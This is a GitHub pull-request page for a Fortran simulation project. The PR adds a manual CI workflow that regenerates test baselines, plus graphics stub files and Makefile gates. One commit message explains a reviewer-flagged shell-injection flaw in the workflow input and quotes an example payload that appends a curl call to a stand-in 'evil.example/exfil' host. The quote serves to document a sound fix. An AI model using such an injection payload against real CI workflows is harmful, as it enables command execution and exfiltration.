Skip to content

ci+eq+tr: workflow_dispatch baseline regen + graphics-stubs (#197)#198

Merged
k-yoshimi merged 4 commits into
developfrom
feat/ci-regen-baselines-workflow
May 12, 2026
Merged

ci+eq+tr: workflow_dispatch baseline regen + graphics-stubs (#197)#198
k-yoshimi merged 4 commits into
developfrom
feat/ci-regen-baselines-workflow

Conversation

@k-yoshimi
Copy link
Copy Markdown
Owner

@k-yoshimi k-yoshimi commented May 12, 2026

Summary

Closes #197 (CI baseline regen env mismatch — clavius gfortran 13.3 vs CI gfortran 13.2 produces ~3e-9 drift on eq_tst2 / tr_tst2 profile arrays). Unblocks #190 (tr_tst2 baseline backfill).

Adds an in-CI baseline-regeneration workflow plus the Fortran graphics-stubs that let eq.x / tr2 standalone binaries build in CI's gfortran-13.2 / Ubuntu-24.04 / no-graphics environment.

Background

PR #196 attempted to resolve #190 by regenerating baselines on clavius (gfortran 13.3). CI rejected the result at 1e-10 tolerance because of compiler-version drift. The diagnostic surfaced that baselines must be generated in the same environment they will be compared against — i.e., CI's Ubuntu 24.04 + gfortran 13.2. This PR is the environment-alignment infrastructure.

Changes (5 files, 1 commit)

File Type Notes
eq/eq_static_stubs.f90 NEW (~384 lines) Copy of tot/tot_static_stubs.f90 body (~378 lines, ~100 GSAF no-op SUBROUTINEs + 2 FUNCTIONs); leading comment header customized for eq context
tr/tr_static_stubs.f90 NEW (~383 lines) Same pattern for tr
eq/Makefile MODIFY (+14/-2) Add EQ_STATIC_STUBS_OBJ GFLIBS-empty gate (mirror tot/Makefile:64-70); include in eq target deps + link line
tr/Makefile MODIFY (+15/-2) Same pattern for tr2 target. Adaptation: uses $(OBJDIR)/tr_static_stubs.o because tr's compile rule is ${OBJDIR}/%.o: %.f90 only (eq has a flat .f90.o: rule, so eq stays unprefixed) — documented inline
.github/workflows/regen-baselines.yml NEW (~205 lines) workflow_dispatch trigger, fixtures input (default "eq_tst2 tr_tst2"); pinned runs-on: ubuntu-24.04; concurrency: + permissions: contents: read; uses make -C tot libs canonical build chain (in-house review MED #1); narrow failure detection (test -s guard); per-module shape check (tot allows empty scalars per extract_tot_metrics.py:5-10, others require non-empty); narrowed dispatch to supported prefixes (tr_* / eq_* / tot_*; fp/ti/wr/wrx rejected with clear error per Codex MED); actions/upload-artifact@v4 with retention-days: 90 + if-no-files-found: error

Plus spec at docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md (376 lines, 4 Codex review rounds converged) and plan at docs/superpowers/plans/2026-05-12-ci-baseline-regen-workflow.md (891 lines, 12 tasks) in earlier commits on this branch.

Verification

  • mac local: gate-flip verification via make -n eq GFLIBS=""/<populated> and make -n tr2 GFLIBS=""/<populated> — stub objects appear in link line iff GFLIBS empty. Both directions confirmed.
  • mac local YAML: python3 -c "import yaml; yaml.safe_load(...)" succeeds.
  • mac local pytest matrix: 236 PASS / 92 SKIPPED / 2 pre-existing FAIL — same as develop baseline (no new failures). git diff origin/develop --name-only excludes test_pipeline.py and test_compare_metrics.py, confirming the 2 pre-existing failures are not introduced by this PR.
  • CI run (this PR): the existing python-tests.yml workflow continues to PASS (this PR does not modify it).
  • Workflow validation (manual, post-merge): trigger regen-baselines.yml from Actions UI with fixtures="eq_tst2 tr_tst2". Should complete in ~10-15 min and produce a non-empty baselines-<run-id>.zip artifact containing eq_tst2/metrics.json (12 scalars) + tr_tst2/metrics.json (14 scalars incl. AJRFT=0.0).

Review trail

  • Brainstorming (2026-05-12): Route I + artifact upload (MVP) + configurable fixtures input.
  • Spec (4 Codex rounds converged): HIGH (ubuntu-24.04 pin), MED 8 (across rounds), LOW handful — all incorporated; R4 = NO MATERIAL FINDINGS.
  • Plan: 12-task bite-sized plan with verbatim workflow YAML embedded.
  • Per-commit reviews: spec compliance ✅; code quality found CRITICAL (incomplete make.header — fixed by copying full python-tests.yml:112-134 content) → ✅.
  • Pre-push parallel reviews: in-house (APPROVE with 2 MED follow-ups) + Codex (1 MED) — all 3 addressed in the final amend (make -C tot libs canonical chain, dropped unused PIC builds, narrowed case dispatch).

Follow-ups (post-merge)

After this PR merges:

  1. Trigger regen-baselines.yml with fixtures="eq_tst2 tr_tst2".
  2. Download artifact → commit metrics.json files + remove the @pytest.mark.xfail decorator added in PR test(trlib): mirror eqlib eqdata fallback to fix silent SKIP (#192) #195. This closes tr_tst2 baseline: backfill AJRFT after eq_tst2 drift fix #190 cleanly.
  3. (Optional) Extend the workflow to support fp_* / ti_* / wr_* / wrx_* fixtures: add fp_static_stubs.f90 etc. + Makefile gates. Separate scope.

🤖 Generated with Claude Code


Note

Medium Risk
Adds a new GitHub Actions workflow that builds and runs standalone Fortran binaries in CI and changes eq/tr2 link behavior when GFLIBS is empty; misconfiguration or missing stubs could break CI baseline regeneration or no-graphics builds.

Overview
Adds a new manual GitHub Actions workflow (regen-baselines.yml) to regenerate per-fixture metrics.json baselines inside CI’s pinned ubuntu-24.04/gfortran environment, then upload the regenerated files as an artifact.

Enables no-graphics CI builds of the standalone eq and tr2 binaries by adding large no-op graphics stub files (eq_static_stubs.f90, tr_static_stubs.f90) and gating their linkage in eq/Makefile and tr/Makefile when GFLIBS is empty, so baseline regen can run without graphics libraries.

Adds accompanying design/implementation documentation in docs/superpowers/specs/... and docs/superpowers/plans/... detailing the workflow, risks, and follow-up steps.

Reviewed by Cursor Bugbot for commit 82786d6. Bugbot is set up for automated code reviews on this repo. Configure here.

k-yoshimi and others added 3 commits May 13, 2026 04:47
Design for issue #197 (CI vs clavius gfortran 13.2/13.3 drift):
add a workflow_dispatch CI job that regenerates baselines in CI's
own environment, sidestepping the clavius cross-host drift that
blocked PR #196.

Two-layer scope:
- Layer A (Fortran): eq_static_stubs.f90 + tr_static_stubs.f90
  mirroring tot's existing graphics-stub pattern + Makefile gates.
  Enables standalone eq.x / tr2 builds without graphics libs in CI.
- Layer B (CI): .github/workflows/regen-baselines.yml with
  workflow_dispatch trigger, configurable `fixtures` input
  (default 'eq_tst2 tr_tst2'), artifact upload of generated
  metrics.json files.

Output handoff: artifact upload (MVP). Auto-PR / auto-commit deferred.

6 files in one commit (4 Fortran + 1 yaml + 1 spec).
Approved scope from brainstorming on 2026-05-12.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Bite-sized 11-task implementation plan for the spec at
docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md
(committed 6deddeb, 4 Codex review rounds converged).

Structure:
- Pre-flight: worktree + sanity (Task 0.1)
- Phase 1 (Tasks 1-4): Layer A — eq + tr static stub files + Makefile
  GFLIBS gates. Per-file: copy from tot precedent, header adjust,
  body verify, AST sanity, Makefile edit, GFLIBS-empty smoke build.
- Phase 2 (Task 5): Layer B — full regen-baselines.yml workflow file
  embedded in the plan (~210 lines). YAML lint + referenced-file
  existence checks.
- Phase 3 (Tasks 6-7): Final verification (gate flips correctly in
  both GFLIBS directions) + single commit.
- Phase 4 (Tasks 8-10): Pre-push gate (bounded pytest + parallel
  reviewers) + push + PR.
- Phase 5 (Task 11): Trigger first workflow_dispatch + verify artifact.

Each task has exact commands, expected outputs, and (where bodies
change) full code snippets. Workflow YAML is embedded verbatim.

Self-review: spec coverage complete (each §4 component → 1+ tasks),
no placeholders (runtime values like <PR#> noted as substitutions),
names consistent across tasks.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…/ tr2 (#197)

Adds an in-CI baseline-regeneration workflow plus the Fortran
graphics-stubs that let the standalone eq / tr2 binaries build in
CI's gfortran-13.2 / Ubuntu-24.04 / no-graphics environment.

Closes #197 and unblocks the #190 (tr_tst2 baseline backfill) path
that PR #196 ran into.

Layer A (Fortran):
- eq/eq_static_stubs.f90: NEW, copy of tot/tot_static_stubs.f90 with
  comment header adjusted for eq context. ~378 lines, ~100 GSAF
  no-op SUBROUTINEs + 2 FUNCTIONs.
- tr/tr_static_stubs.f90: NEW, same pattern for tr.
- eq/Makefile, tr/Makefile: add the `ifeq ($(strip $(GFLIBS)),)`
  gate (mirror tot/Makefile:64-70) that conditionally links
  EQ_STATIC_STUBS_OBJ / TR_STATIC_STUBS_OBJ into the standalone
  binary target. With GFLIBS populated (clavius / dev hosts), gate
  expands empty -> no link impact. With GFLIBS empty (CI / no-graphics),
  links the stubs.

Layer B (CI):
- .github/workflows/regen-baselines.yml: NEW, ~210 lines.
  - workflow_dispatch trigger with `fixtures` input (default
    "eq_tst2 tr_tst2").
  - runs-on: ubuntu-24.04 (pinned, NOT ubuntu-latest), matching
    python-tests.yml's gfortran 13.2.0 environment.
  - concurrency block (mirrors python-tests.yml:15-17).
  - permissions: contents: read (least-privilege).
  - Per-module dump-path dispatch by fixture-name prefix
    (tr_* / eq_* / tot_* / fp_* / ti_* / wr_* / wrx_*).
  - Narrow failure detection: `test -s <dump>` guard distinguishes
    binary crash from expected baseline-mismatch.
  - Per-module shape check (jq): tr/eq require non-empty scalars;
    tot allows empty scalars (TR_PRESENT=0 valid per
    extract_tot_metrics.py:5-10).
  - Uploads regen-output/ as artifact (90-day retention).

Stub-duplication trade-off: 3 files (tot + eq + tr) now contain
the same ~378-line no-op stub body. Accepted per spec §3
non-goals - shared lib/ refactor is a follow-up. Stubs change
rarely (every ~6 months when a new graphics symbol appears).

Spec: docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md
(376 lines, 4 Codex review rounds converged).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@k-yoshimi
Copy link
Copy Markdown
Owner Author

@cursor review

Comment thread .github/workflows/regen-baselines.yml Outdated
Comment thread .github/workflows/regen-baselines.yml
…cument env-pin divergence (Bugbot LOW)

Bugbot found 2 issues on PR #198 HEAD 98298ea:

MEDIUM (security): the `for fixture in ${{ inputs.fixtures }}` line
expanded the workflow_dispatch input directly into the shell script
body before bash parsed it. A user with write access triggering
the workflow could inject arbitrary shell commands through the
fixtures input (e.g. `eq_tst2"; curl evil.example/exfil`).
Mitigation: pass via `env: FIXTURES: ${{ inputs.fixtures }}` so
bash reads it as a normal variable. The case-statement
restriction to tr_*/eq_*/tot_* prefixes provides defense in depth.

LOW (env divergence): this workflow pins runs-on: ubuntu-24.04 to
match python-tests.yml's current gfortran 13.2.0, but
python-tests.yml uses ubuntu-latest, which will silently rotate
to a newer compiler. Documented the divergence risk inline with
the mitigation (pin python-tests.yml when GH rotates).

Same workflow file; no test impact (the Bugbot findings affect
runtime behaviour on triggered runs, not the workflow's static
YAML structure or python-tests.yml flow).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@k-yoshimi
Copy link
Copy Markdown
Owner Author

@cursor review

Copy link
Copy Markdown

@cursor cursor Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

✅ Bugbot reviewed your changes and found no new issues!

Comment @cursor review or bugbot run to trigger another review on this PR

Reviewed by Cursor Bugbot for commit 82786d6. Configure here.

@k-yoshimi k-yoshimi merged commit 7a436d3 into develop May 12, 2026
3 checks passed
@k-yoshimi k-yoshimi deleted the feat/ci-regen-baselines-workflow branch May 12, 2026 23:28
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant